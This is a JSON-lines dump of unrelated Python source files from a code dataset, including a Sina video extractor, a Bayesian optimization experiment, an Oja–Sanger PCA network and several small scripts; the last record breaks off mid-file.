+{"seq_id":"643433259","text":"# @EXPECTED_RESULTS@: CORRECT\n\n#N log(N) solution (simulation)\nfrom sys import stdin;\nelim = [False];\n\n\nclass Solver:\n\n\tdef __init__(self):\n\t\tself.elim = [False];\n\n\tdef get_next_next(self, i):\n\t\telim = self.elim;\n\t\tN = len(elim);\n\t\tj=i;\n\t\tone = False;\n\t\twhile(True):\n\t\t\tj=j+1; j=j% N;\n\t\t\tif(not one and j==i):\n\t\t\t\treturn -1;\n\t\t\telif(not one and not elim[j]):\n\t\t\t\tone = True;\n\t\t\telif(one and not elim[j]):\n\t\t\t\treturn j;\n\n\tdef solve_iter(self,N):\n\t\tself.elim = N*[False];\n\t\telim = self.elim;\n\t\tif(N==1):\n\t\t\treturn 1;\n\t\ti = 1;\n\t\twhile(True):\n\t\t\tj = self.get_next_next(i);\n\t\t\tif(j==-1):\n\t\t\t\treturn i+1;\n\t\t\telim[i] = True;\n\t\t\ti = j;\n\n\nline = stdin.readline().strip();\nN = int(line);\nsol = Solver(); \nans = sol.solve_iter(N);\nprint(ans);\n\n","sub_path":"elect/elect-small-tb.py","file_name":"elect-small-tb.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"297023787","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom ykdl.extractor import VideoExtractor\nfrom ykdl.util.match import match1, matchall\nfrom ykdl.util.html import get_content, get_location\nfrom ykdl.videoinfo import VideoInfo\n\nimport json\n\ndef get_realurl(url):\n    location = get_location(url)\n    if location != url:\n        return location\n    else:\n        html = get_content(url)\n        return matchall(html, 
['CDATA\\[([^\\]]+)'])[1]\n\nclass Sina(VideoExtractor):\n name = u\"新浪视频 (sina)\"\n\n def prepare(self):\n info = VideoInfo(self.name)\n if not self.vid:\n html = get_content(self.url)\n self.vid = match1(html, 'video_id:\\'([^\\']+)') or match1(self.url, '#(\\d+)')\n\n assert self.vid, \"can't get vid\"\n\n api_url = 'http://s.video.sina.com.cn/video/h5play?video_id={}'.format(self.vid)\n data = json.loads(get_content(api_url))['data']\n info.title = data['title']\n for t in ['mp4', '3gp', 'flv']:\n if t in data['videos']:\n video_info = data['videos'][t]\n break\n\n for profile in video_info:\n if not profile in info.stream_types:\n v = video_info[profile]\n tp = v['type']\n url = v['file_api']+'?vid='+v['file_id']\n r_url = get_realurl(url)\n info.stream_types.append(profile)\n info.streams[profile] = {'container': tp, 'video_profile': profile, 'src': [r_url], 'size' : 0}\n return info\n\n def prepare_list(self):\n html = get_content(self.url)\n return matchall(html, ['video_id: ([^,]+)'])\n\nsite = Sina()\n","sub_path":"ykdl/extractors/sina/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171659559","text":"#!/usr/bin/python\nimport numpy as np\nfrom python.heatmap_sea import *\nfrom python.data_parser import *\n\nlocation=\"../data/intensity/sequential/collocate_\"\n\n\nprint (\"-----------------------------------------GPU Energy ratio data ----------------------\")\narray = np.zeros((15,15))\nprint (array)\nfor i in range(1,16,1): \n for j in range(1,16,1): \n array[i - 1][j - 1] = matrix_energy_ratio(location,\"gpu\",str(i),\"cpu\",str(j))\n #array[j - 1][i - 1] = matrix_energy_ratio(location,\"gpu\",str(i),\"cpu\",str(j))\n\n print (\"\")\n\n#print array\n#heat(array,\"GPU: Energy Ratio (collocated/standalone)\",\"GPU\", \"CPU\")\nheat(array,\"GPU: Energy Factor\",\"GPU\", \"CPU\", \"Energy scale\")\n#heat(array,\"For GPU: Energy Ratio (collocated/standalone)\",\"GPU\", \"CPU\", \"Ratio of Collocated and Standalone Energy for GPU\")\n\n\n\n\n","sub_path":"modified_ert/python_process_scripts/script_col_cpugpu1.py","file_name":"script_col_cpugpu1.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"447545036","text":"from setuptools import setup, find_packages\n\n\nlong_description = open(\"README.rst\", \"r\").read()\n\n\nsetup(\n name=\"arackpy\",\n\n version=\"0.1\",\n\n description=\"A multithreaded webcrawler and scraper\",\n\n # display on pypi\n long_description=long_description,\n\n url=\"https://www.bitbucket.com/denisgomes/arackpy\",\n\n author=\"Denis Gomes\",\n\n author_email=\"denisg640@hotmail.com\",\n\n license=\"BSD\",\n\n # advertise program attributes\n classifiers=[\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n ],\n\n keywords=\"web crawler scraper\",\n\n # excluded in build distributions, applies to packages only\n packages=find_packages(exclude=[\n \"arackpy.docs\", \"arackpy.examples\", \"arackpy.tests\"\n ]),\n\n # install from pypi, requirements.txt is for developers only\n install_requires=[],\n\n package_data={},\n\n # MANIFEST.in works for source distributions only\n data_files=[(\"\", [\"LICENSE.txt\", \"README.rst\"])],\n\n # scripts= ,\n\n # tests\n test_suite=\"tests\",\n\n 
)\n","sub_path":"pypi_install_script/arackpy-0.1.0a1-py2-none-any/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122730451","text":"\"\"\"\nPick 4 functions. See how the KG evolves and try out sampling rules.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nimport numpy as np\nimport os, sys\nimport time\n\nfrom moe.optimal_learning.python.cpp_wrappers.domain import TensorProductDomain as cppTensorProductDomain\nfrom moe.optimal_learning.python.cpp_wrappers.knowledge_gradient_mcmc import PosteriorMeanMCMC\nfrom moe.optimal_learning.python.cpp_wrappers.log_likelihood_mcmc import \\\n GaussianProcessLogLikelihoodMCMC as cppGaussianProcessLogLikelihoodMCMC\nfrom moe.optimal_learning.python.cpp_wrappers.optimization import \\\n GradientDescentParameters as cppGradientDescentParameters\nfrom moe.optimal_learning.python.cpp_wrappers.optimization import \\\n GradientDescentOptimizer as cppGradientDescentOptimizer\nfrom moe.optimal_learning.python.cpp_wrappers.knowledge_gradient import posterior_mean_optimization, PosteriorMean\n\nfrom moe.optimal_learning.python.data_containers import HistoricalData, SamplePoint\nfrom moe.optimal_learning.python.geometry_utils import ClosedInterval\nfrom moe.optimal_learning.python.repeated_domain import RepeatedDomain\nfrom moe.optimal_learning.python.default_priors import DefaultPrior\n\nfrom moe.optimal_learning.python.python_version.domain import TensorProductDomain as pythonTensorProductDomain\nfrom moe.optimal_learning.python.python_version.optimization import \\\n GradientDescentParameters as pyGradientDescentParameters\nfrom moe.optimal_learning.python.python_version.optimization import \\\n GradientDescentOptimizer as pyGradientDescentOptimizer\nfrom moe.optimal_learning.python.python_version.optimization import multistart_optimize as multistart_optimize\n\nfrom examples import bayesian_optimization\nfrom examples import synthetic_functions\n\n# arguments for calling this script:\n# python main.py [obj_func_name] [method_name] [num_to_sample] [job_id]\n# example: python main.py Branin KG 4 1\n# you can define your own obj_function and then just change the objective_func object below, and run this script.\n\n# argv = sys.argv[1:]\n# obj_func_name = str(argv[0])\nmethod = \"KG\"\nnum_to_sample = 1\n# job_id = int(argv[3])\n\n# constants\n# num_func_eval = 12\n# num_iteration = int(old_div(num_func_eval, num_to_sample)) + 1\n\nobj_func_dict = {'Branin': synthetic_functions.Branin(),\n 'Rosenbrock': synthetic_functions.Rosenbrock(),\n 'Hartmann3': synthetic_functions.Hartmann3(),\n 'Levy4': synthetic_functions.Levy4(),\n 'Hartmann6': synthetic_functions.Hartmann6(),\n 'Ackley': synthetic_functions.Ackley()}\n\nobjective_func_list = [obj_func_dict[\"Branin\"], obj_func_dict[\"Rosenbrock\"], obj_func_dict[\"Hartmann3\"],\n obj_func_dict[\"Hartmann6\"]]\n# objective_func = obj_func_dict[obj_func_name]\ndim = [int(objective_func._dim) for objective_func in objective_func_list]\nnum_initial_points = [int(objective_func._num_init_pts) for objective_func in objective_func_list]\n\nnum_fidelity = [0, 0, 0, 0]\ninner_search_domain = [0, 0, 0, 0]\ncpp_search_domain = [0, 0, 0, 0]\ncpp_inner_search_domain = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n 
num_fidelity[i] = objective_func._num_fidelity\n inner_search_domain[i] = pythonTensorProductDomain([ClosedInterval(objective_func._search_domain[i, 0], objective_func._search_domain[i, 1])\n for i in range(objective_func._search_domain.shape[0] - num_fidelity[i])])\n cpp_search_domain[i] = cppTensorProductDomain([ClosedInterval(bound[0], bound[1]) for bound in objective_func._search_domain])\n cpp_inner_search_domain[i] = cppTensorProductDomain([ClosedInterval(objective_func._search_domain[i, 0], objective_func._search_domain[i, 1])\n for i in range(objective_func._search_domain.shape[0] - num_fidelity[i])])\n\ninit_pts = [0, 0, 0, 0]\nderivatives = [0, 0, 0, 0]\nobservations = [0, 0, 0, 0]\ninit_pts_value = [0, 0, 0, 0]\ntrue_value_init = [0, 0, 0, 0]\ninit_data = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n # get the initial data\n init_pts[i] = np.zeros((objective_func._num_init_pts, objective_func._dim))\n init_pts[i][:,\n :objective_func._dim - objective_func._num_fidelity] = inner_search_domain[\n i].generate_uniform_random_points_in_domain(\n objective_func._num_init_pts)\n for pt in init_pts[i]:\n pt[objective_func._dim - objective_func._num_fidelity:] = np.ones(objective_func._num_fidelity)\n\n # observe\n derivatives[i] = objective_func._observations\n observations[i] = [0] + [j + 1 for j in derivatives[i]]\n init_pts_value[i] = np.array([objective_func.evaluate(pt) for pt in init_pts[i]]) # [:, observations]\n true_value_init[i] = np.array([objective_func.evaluate_true(pt) for pt in init_pts[i]]) # [:, observations]\n\n init_data[i] = HistoricalData(dim=objective_func._dim, num_derivatives=0)\n init_data[i].append_sample_points([SamplePoint(pt, [init_pts_value[i][num, j] for j in observations[i]],\n objective_func._sample_var) for num, pt in enumerate(init_pts[i])])\n\nprior = [0, 0, 0, 0]\ncpp_gp_loglikelihood = [0, 0, 0, 0]\nfor i in range(4):\n # initialize the model\n prior[i] = DefaultPrior(1 + dim[i] + len(observations[i]), len(observations[i]))\n\n # noisy = False means the underlying function being optimized is noise-free\n cpp_gp_loglikelihood[i] = cppGaussianProcessLogLikelihoodMCMC(historical_data=init_data[i],\n derivatives=derivatives[i],\n prior=prior[i],\n chain_length=1000,\n burnin_steps=2000,\n n_hypers=2 ** 4,\n noisy=False)\n cpp_gp_loglikelihood[i].train()\n\npy_sgd_params_ps = pyGradientDescentParameters(max_num_steps=1000,\n max_num_restarts=3,\n num_steps_averaged=15,\n gamma=0.7,\n pre_mult=1.0,\n max_relative_change=0.02,\n tolerance=1.0e-10)\n\ncpp_sgd_params_ps = cppGradientDescentParameters(num_multistarts=1,\n max_num_steps=6,\n max_num_restarts=1,\n num_steps_averaged=3,\n gamma=0.0,\n pre_mult=1.0,\n max_relative_change=0.1,\n tolerance=1.0e-10)\n\ncpp_sgd_params_kg = cppGradientDescentParameters(num_multistarts=200,\n max_num_steps=50,\n max_num_restarts=2,\n num_steps_averaged=4,\n gamma=0.7,\n pre_mult=1.0,\n max_relative_change=0.5,\n tolerance=1.0e-10)\n\neval_pts = [0, 0, 0, 0]\ntest = [0, 0, 0, 0]\nps = [0, 0, 0, 0]\npy_repeated_search_domain = [0, 0, 0, 0]\nps_mean_opt = [0, 0, 0, 0]\nreport_point = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n # minimum of the mean surface\n eval_pts[i] = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e3))\n eval_pts[i] = np.reshape(\n np.append(eval_pts[i], (cpp_gp_loglikelihood[i].get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts[i].shape[0] + 
cpp_gp_loglikelihood[i]._num_sampled,\n cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n test[i] = np.zeros(eval_pts[i].shape[0])\n ps[i] = PosteriorMeanMCMC(cpp_gp_loglikelihood[i].models, num_fidelity[i])\n for j, pt in enumerate(eval_pts[i]):\n ps[i].set_current_point(pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[i] = -ps[i].compute_objective_function()\n report_point[i] = eval_pts[i][np.argmin(test[i])].reshape(\n (1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n py_repeated_search_domain[i] = RepeatedDomain(num_repeats=1, domain=inner_search_domain[i])\n ps_mean_opt[i] = pyGradientDescentOptimizer(py_repeated_search_domain[i], ps[i], py_sgd_params_ps)\n report_point[i] = multistart_optimize(ps_mean_opt[i], report_point[i], num_multistarts=1)[0]\n report_point[i] = report_point[i].ravel()\n report_point[i] = np.concatenate((report_point[i], np.ones(objective_func._num_fidelity)))\n\ncurrent_best = [0, 0, 0, 0]\nbest_point = report_point\nfor i in range(4):\n current_best[i] = true_value_init[i][np.argmin(true_value_init[i][:, 0])][0]\n print(\"obj \", i, \" best so far in the initial data {0}\".format(current_best[i]))\n # print(\"obj \", i, \"report point value\", objective_func_list[i].evaluate_true(report_point[i])[0])\ncapital_so_far = 0\n\nnext_points = [0, 0, 0, 0]\nvoi = [0, 0, 0, 0]\nfor i in range(4):\n objective_func = objective_func_list[i]\n # KG\n time1 = time.time()\n discrete_pts_list = []\n\n discrete, _ = bayesian_optimization.gen_sample_from_qei_mcmc(cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_search_domain[i],\n cpp_sgd_params_kg, 10, num_mc=2 ** 10)\n for j, cpp_gp in enumerate(cpp_gp_loglikelihood[i].models):\n discrete_pts_optima = np.array(discrete)\n\n eval_pts = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e3))\n eval_pts = np.reshape(np.append(eval_pts,\n (cpp_gp.get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts.shape[0] + cpp_gp.num_sampled, cpp_gp.dim - objective_func._num_fidelity))\n\n test = np.zeros(eval_pts.shape[0])\n ps_evaluator = PosteriorMean(cpp_gp, num_fidelity[i])\n for k, pt in enumerate(eval_pts):\n ps_evaluator.set_current_point(pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[k] = -ps_evaluator.compute_objective_function()\n\n initial_point = eval_pts[np.argmin(test)]\n\n ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n report_point = posterior_mean_optimization(ps_sgd_optimizer, initial_guess=initial_point, max_num_threads=4)\n\n ps_evaluator.set_current_point(\n report_point.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n if -ps_evaluator.compute_objective_function() > np.min(test):\n report_point = initial_point\n\n discrete_pts_optima = np.reshape(np.append(discrete_pts_optima, report_point),\n (discrete_pts_optima.shape[0] + 1,\n cpp_gp.dim - objective_func._num_fidelity))\n discrete_pts_list.append(discrete_pts_optima)\n\n ps_evaluator = PosteriorMean(cpp_gp_loglikelihood[i].models[0], num_fidelity[i])\n ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n # KG method\n next_points[i], voi[i] = bayesian_optimization.gen_sample_from_qkg_mcmc(\n cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_gp_loglikelihood[i].models,\n ps_sgd_optimizer, cpp_search_domain[i],\n 
num_fidelity[i], discrete_pts_list,\n cpp_sgd_params_kg, num_to_sample,\n num_mc=2 ** 7)\n print(method + \" takes \" + str((time.time() - time1)) + \" seconds for objective\", i)\n print(method + \" suggests points: \", next_points[i], \" with voi: \", voi[i])\n\nwhile True:\n print(method + \", multiples, {0}th iteration\".format(capital_so_far))\n\n # print(\"Suggested points: \", next_points)\n print(\"Corresponding voi: \", voi)\n print(\"Current best: \", current_best)\n\n i = int(input(\"pick the next sample i = {0, 1, 2, 3} (or -1 to quit): \"))\n if i == -1:\n break\n\n objective_func = objective_func_list[i]\n\n time1 = time.time()\n\n sampled_points = [SamplePoint(pt, objective_func.evaluate(pt)[observations[i]], objective_func._sample_var) for pt in\n next_points[i]]\n\n print(\"evaluating takes \" + str((time.time() - time1)) + \" seconds\")\n\n capital_so_far += len(sampled_points)\n print(\"evaluating takes capital \" + str(capital_so_far) + \" so far\")\n\n # retrain the model\n time1 = time.time()\n\n cpp_gp_loglikelihood[i].add_sampled_points(sampled_points)\n cpp_gp_loglikelihood[i].train()\n\n print(\"retraining the model takes \" + str((time.time() - time1)) + \" seconds\")\n time1 = time.time()\n\n # report the point\n eval_pts = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e4))\n eval_pts = np.reshape(np.append(eval_pts, (cpp_gp_loglikelihood[i].get_historical_data_copy()).points_sampled[:,\n :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n (eval_pts.shape[0] + cpp_gp_loglikelihood[i]._num_sampled,\n cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n ps = PosteriorMeanMCMC(cpp_gp_loglikelihood[i].models, num_fidelity[i])\n test = np.zeros(eval_pts.shape[0])\n for j, pt in enumerate(eval_pts):\n ps.set_current_point(pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n test[j] = -ps.compute_objective_function()\n initial_point = eval_pts[np.argmin(test)].reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity))\n\n py_repeated_search_domain = RepeatedDomain(num_repeats=1, domain=inner_search_domain[i])\n ps_mean_opt = pyGradientDescentOptimizer(py_repeated_search_domain, ps, py_sgd_params_ps)\n report_point = multistart_optimize(ps_mean_opt, initial_point, num_multistarts=1)[0]\n\n ps.set_current_point(report_point.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n if -ps.compute_objective_function() > np.min(test):\n report_point = initial_point\n\n report_point = report_point.ravel()\n report_point = np.concatenate((report_point, np.ones(objective_func._num_fidelity)))\n\n print()\n print(\"Optimization finished successfully!\")\n print(\"The recommended point: \", end=' ')\n print(report_point)\n print(\"recommending the point takes \" + str((time.time() - time1)) + \" seconds\")\n best_point[i] = report_point\n current_best[i] = objective_func.evaluate_true(report_point)[0]\n print(method + \", VOI {0}, best so far {1}\".format(voi[i], current_best[i]))\n\n time1 = time.time()\n # KG\n discrete_pts_list = []\n\n discrete, _ = bayesian_optimization.gen_sample_from_qei_mcmc(cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n cpp_search_domain[i],\n cpp_sgd_params_kg, 10, num_mc=2 ** 10)\n for j, cpp_gp in enumerate(cpp_gp_loglikelihood[i].models):\n discrete_pts_optima = np.array(discrete)\n\n eval_pts = inner_search_domain[i].generate_uniform_random_points_in_domain(int(1e3))\n eval_pts = np.reshape(np.append(eval_pts,\n 
(cpp_gp.get_historical_data_copy()).points_sampled[:,\n                                                    :(cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)]),\n                              (eval_pts.shape[0] + cpp_gp.num_sampled, cpp_gp.dim - objective_func._num_fidelity))\n\n        test = np.zeros(eval_pts.shape[0])\n        ps_evaluator = PosteriorMean(cpp_gp, num_fidelity[i])\n        for k, pt in enumerate(eval_pts):\n            ps_evaluator.set_current_point(\n                pt.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n            test[k] = -ps_evaluator.compute_objective_function()\n\n        initial_point = eval_pts[np.argmin(test)]\n\n        ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n        report_point = posterior_mean_optimization(ps_sgd_optimizer, initial_guess=initial_point, max_num_threads=4)\n\n        ps_evaluator.set_current_point(\n            report_point.reshape((1, cpp_gp_loglikelihood[i].dim - objective_func._num_fidelity)))\n        if -ps_evaluator.compute_objective_function() > np.min(test):\n            report_point = initial_point\n\n        discrete_pts_optima = np.reshape(np.append(discrete_pts_optima, report_point),\n                                         (discrete_pts_optima.shape[0] + 1,\n                                          cpp_gp.dim - objective_func._num_fidelity))\n        discrete_pts_list.append(discrete_pts_optima)\n\n    ps_evaluator = PosteriorMean(cpp_gp_loglikelihood[i].models[0], num_fidelity[i])\n    ps_sgd_optimizer = cppGradientDescentOptimizer(cpp_inner_search_domain[i], ps_evaluator, cpp_sgd_params_ps)\n    # KG method\n    next_points[i], voi[i] = bayesian_optimization.gen_sample_from_qkg_mcmc(\n        cpp_gp_loglikelihood[i]._gaussian_process_mcmc,\n        cpp_gp_loglikelihood[i].models,\n        ps_sgd_optimizer, cpp_search_domain[i],\n        num_fidelity[i], discrete_pts_list,\n        cpp_sgd_params_kg, num_to_sample,\n        num_mc=2 ** 7)\n\n    print(method + \" takes \" + str((time.time() - time1)) + \" seconds for objective\", i)\n    print(method + \" suggests points: \", next_points[i], \" with voi: \", voi[i])\n","sub_path":"examples/multi_kg_try.py","file_name":"multi_kg_try.py","file_ext":"py","file_size_in_byte":18482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416758828","text":"# Given a non-empty array of integers, return the k most frequent elements. \n# \n# \n# \n# Example 1: \n# \n# Input: nums = [1,1,1,2,2,3], k = 2\n# Output: [1,2]\n# \n# \n# Example 2: \n# \n# Input: nums = [1], k = 1\n# Output: [1] \n# \n# \n# \n# Notes: \n# \n# \n# You may assume the given k is always valid, with 1 ≤ k ≤ the number of distinct elements in the array. \n# Your algorithm's time complexity must be better than O(n log n), where n is the size of the array. \n# The test data guarantees the answer is unique; in other words, the set of the k most frequent elements in the array is unique. \n# You may return the answer in any order. \n# \n# Related Topics: Heap, Hash Table \n# 👍 421 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n    def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n        dit = {}\n        for i in nums:\n            if i not in dit:\n                dit[i] = 1\n            else:\n                dit[i] = dit[i] + 1\n        temp = []\n        for item in dit.items():\n            temp.append(item[::-1])\n        temp.sort(reverse=True)\n        return [temp[i][1] for i in range(k)]\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_02/[347]前 K 个高频元素.py","file_name":"[347]前 K 个高频元素.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454448349","text":"import math\nimport numpy as np\nimport random\nimport os\n\nclass redOjaSanger(object):\n    '''\n    Neural network for computing principal components\n    '''\n    #Initializes the weight matrix with small values\n    def __init__(self,Dim=[2,2,1],w_init=10,beta=1,verbose=7):\n        #Dim is a list with the dimension of each layer\n        #Dim[-1]==output // Dim[0]==input\n        #w_init is 
a maximum/minimum bound for the initial weights \n        #(They are generated between w_init/100 and -w_init/100)\n        self.w_ = [];\n        for i in range(len(Dim)-1):\n            #Fills self.w_ with one array per gap between layers (len(Dim)-1 layers)\n            #Each element of self.w_ is a numpy array with all the weights of that layer (randomly initialized)\n            self.w_.append(np.array([[random.randint(-w_init,w_init)/100 for i in range(Dim[i]+1)] for j in range(Dim[i+1])]));\n\n        self.Dim = Dim;\n        self.beta = beta;\n        #This is set high for testing\n        self.verbose = verbose;\n\n        print('\\nThe neural network was created successfully.')\n        if self.verbose >= 10:\n            print('Weight matrix (includes bias):\\n')\n            for x in self.w_:\n                print(x)\n            print('')\n\n    #Derivative of the identity function\n    def _derivada_identidad(self,n,b):\n        return b\n\n    #Identity function\n    def _funcion_identidad(self,n,b):\n        return n*b\n\n    #Function that computes the sum of w(ki)*y(k) over all output values\n    def _suma_Oja(self,output,y):\n        cont = 0;\n        #Iterate over each position of the output\n        #z is k in the theory notes\n        for z in range(len(output)):\n            cont += self.w_OjaSanger[z,y]*output[z];\n        return cont\n\n    #Function to update the weights according to the Oja rule\n    def _Oja_update(self,n_train,current,output):\n        #Iterate over each row of the weight matrix (j in the theory notes)\n        for x in range(len(self.w_OjaSanger)):\n            #Iterate over each entry of each row of the weight matrix (each column, i in the theory notes)\n            for y in range(len(self.w_OjaSanger[x])):\n                self.w_OjaSanger[x,y] += n_train*output[x]*(current[y]-self._suma_Oja(output,y))\n        return self\n\n    #Function to update the weights according to the Sanger rule\n    def _Sanger_update(self,n_train,current,output):\n        #Iterate over each row of the weight matrix (j in the theory notes)\n        for x in range(len(self.w_OjaSanger)):\n            #Iterate over each entry of each row of the weight matrix (each column, i in the theory notes)\n            for y in range(len(self.w_OjaSanger[x])):\n                self.w_OjaSanger[x,y] += n_train*output[x]*(current[y]-self._suma_Sanger(output,y,x)-self.w_OjaSanger[x,y]*output[x])\n        return self\n\n    #Function that computes the sum of w(ki)*y(k) for output values up to neuron j-1 (j in the theory notes)\n    def _suma_Sanger(self,output,y,x):\n        cont = 0;\n        #Iterate over each output value up to neuron x-1 (j-1 in the theory notes)\n        #z is k in the theory notes\n        for z in range(x):\n            cont += self.w_OjaSanger[z,y]*output[z];\n        return cont\n\n    #Function to check whether the weight change between epochs is significant\n    def _w_OjaSanger_check(self,tolerance):\n        change = 0;\n        #Iterate over each row of the weight matrix\n        for x in range(len(self.w_OjaSanger_log_[-1])):\n            #Iterate over each entry of each row of the weight matrix (each column)\n            for y in range(len(self.w_OjaSanger_log_[-1][x])):\n                change += (self.w_OjaSanger_log_[-1][x][y]-self.w_OjaSanger_log_[-2][x][y])**2\n        if math.sqrt(change) <= tolerance:\n            print('The change value was below the tolerance. 
Training is stopped.\\nVector change:')\n            print(math.sqrt(change))\n        return math.sqrt(change) > tolerance\n\n    #Function that returns n principal components according to the Oja rule\n    def OjaSanger(self,n,L_in,n_train=0.05,w_tolerance=0.001,w_init=50,OjaSanger=0):\n        #n is the number of principal components the function returns\n        #L_in is the list containing the data (input only)\n        #L_in must be centered at 0\n\n        #First initialize the weights of the principal components\n        self.w_OjaSanger = np.array([[random.randint(-w_init,w_init)/100 for x in range(len(L_in[0]))] for y in range(n)]);\n\n        print('\\nThe Oja-Sanger neural network was created successfully.')\n        if self.verbose >= 7:\n            print('Weight matrix (does not include bias):')\n            for x in self.w_OjaSanger:\n                print(x)\n            print('')\n\n        #Initialize the weight log\n        self.w_OjaSanger_log_ = [np.copy(self.w_OjaSanger)];\n\n        #i enforces a minimum number of iterations in case the function flattens out early\n        i=0;\n        #b checks that the weight change is significant\n        b=True;\n        while b:\n\n            #Correction coefficient for n_train\n            corr_n = n_train*w_tolerance*i\n\n            #Once per pass over L_in the list is reshuffled\n            if i%len(L_in) == 0:\n                random.shuffle(L_in);\n                if self.verbose >= 7 and i > 0:\n                    print('Iteration number ' + str(i));\n\n            #current represents the current input\n            current = L_in[i%len(L_in)];\n\n            #output is the result of input*weights\n            output = np.dot(self.w_OjaSanger,current);\n\n            #Then update the weights\n            if OjaSanger == 0:\n                #Update according to the Oja rule\n                self._Oja_update(n_train,current,output);\n            elif OjaSanger == 1:\n                #Update according to the Sanger rule\n                self._Sanger_update(n_train-corr_n,current,output);\n            else:\n                print('Error message 1/2 for variable OjaSanger.')\n\n            if self.verbose >= 8:\n                print('Updated weight matrix:\\n')\n                for k in self.w_OjaSanger:\n                    print(k)\n                print('')\n\n            #Append the updated weights to the log\n            self.w_OjaSanger_log_.append(np.copy(self.w_OjaSanger));\n\n            #Check whether the weight change is significant\n            b = i < int(math.sqrt(len(L_in))) or self._w_OjaSanger_check(w_tolerance);\n\n            i+=1;\n\n        if OjaSanger == 0:\n            print('\\nTraining with the Oja rule has finished.\\nFinal weights:');\n        elif OjaSanger == 1:\n            print('\\nTraining with the Sanger rule has finished.\\nFinal weights:');\n        else:\n            print('Error message 2/2 for variable OjaSanger.')\n\n        for x in self.w_OjaSanger:\n            print(x);\n\n        return self.w_OjaSanger\n","sub_path":"otros/ClaseOjaSangerEmilio.py","file_name":"ClaseOjaSangerEmilio.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"546433239","text":"import numpy\nimport matplotlib.pyplot as pyplot\nimport sys\nimport pencil\nimport pickle\n\nparameters = pencil.read_param()\n\nsnap = -1\nvar = \"pvar.dat\"\nif len(sys.argv) == 2:\n    snap = int(sys.argv[1])\n    var = \"PVAR\" + sys.argv[1]\ndata = pencil.read_var(ivar=snap,magic=\"vorticity\")\npdata = pencil.read_pvar(varfile=var)\n\nx = data.x[3:-3]\ny = data.y[3:-3]\nz = data.z[3:-3]\nux = data.ux[3:-3,3:-3,3:-3]\nuy = data.uy[3:-3,3:-3,3:-3]\nuz = data.uz[3:-3,3:-3,3:-3]\nrho = data.rho[3:-3,3:-3,3:-3]\n\nxp = pdata.xp\nyp = pdata.yp\nzp = pdata.zp\nvpx = pdata.vpx\nvpy = pdata.vpy\nvpz = pdata.vpz\n\ncontours_figure, ((ax1,ax2,ax3)) = pyplot.subplots(1,3)\nplots_figure, ((ax4,ax5,ax6)) = pyplot.subplots(1,3)\n\niyslice = 0\nmarkersize = 0.1\n\n# rms velocity (mean subtracted?) 
